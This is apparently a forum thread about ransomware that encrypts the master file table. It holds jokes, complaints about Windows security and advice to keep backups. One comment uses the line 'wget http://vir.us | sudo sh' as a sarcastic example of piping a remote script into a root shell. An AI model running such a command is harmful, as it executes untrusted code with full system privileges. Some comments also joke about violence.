Ransomware gets a lot faster by encrypting the master file table instead of the filesystem

FTFY! :slight_smile:

1 Like

Both. Microsoft was so worried about keeping their monopoly that they opened Windows and Office up in all sorts of ways to make sure people didn’t use any alternates. Now it’s biting the world in the ass, but they don’t know what else to do.

My best guess is that Comp Sci ain’t Comp Information Systems.

Or he’s looking at shady porn at work.

Lots of shady porn.

I’m not worried. As soon as this starts hitting bigger and more lucrative targets, the US will start droning people. Problem solved. Amirite?

4 Likes

Oh I don’t think competence is necessary. Even Geek Squad can undelete a file.

1 Like

I’m waiting for the ransomware that fills a house with diesel and then dumps 5k liters of liquid oxygen through a large hole in the ceiling.

2 Likes

In regards to your question about MBR, this sort of attack would work against any filesystem or disk format, in any OS, as long as the virus/trojan is able to obtain the necessary permissions to do low level disk edits.

Obviously this particular program is only designed to attack a certain set of operating systems, so it won’t run correctly in Linux or your phone or whatnot. However, if you can get low level disk access, a similar program would work fine anywhere.

The difference between Windows and other operating systems in this regard is really only about how difficult it is to get access. It’s typically very easy to get user and root level access in Windows due to the history of poor security and user practices there, but it’s not like Linux programs that you install via “wget http://vir.us | sudo sh” are any better…

Plus, in Windows you have this whole frankly bizarre history where the standard practices for computer intrusion became “run a virus scanner provided by this bizarre cottage industry” rather than “burn the computer to the ground, fix the horrifying security flaws, and reinstall from clean media.” In other words, the standard idea seems to be to just accept that getting a virus is OK, and your virus scanner will auto update and fix it the day after tomorrow. Even though it’s obvious to any sane person that as soon as it gets root, game over man. Game over.

4 Likes

Solution: never keep anything on your computer that you aren’t willing to burn and do a fresh install. Backups are your friend. This may or may not include buying a new hard drive, I am not the most computer literate person.

My Mac Duo, circa 1992, used to do this about every 6 months all by itself. The first time it happened I did a full restore and learned a valuable lesson about backups. The second time I debugged the problem and ended up restoring the MBR. I still have that restore floppy somewhere.

1 Like

This topic was automatically closed after 5 days. New replies are no longer allowed.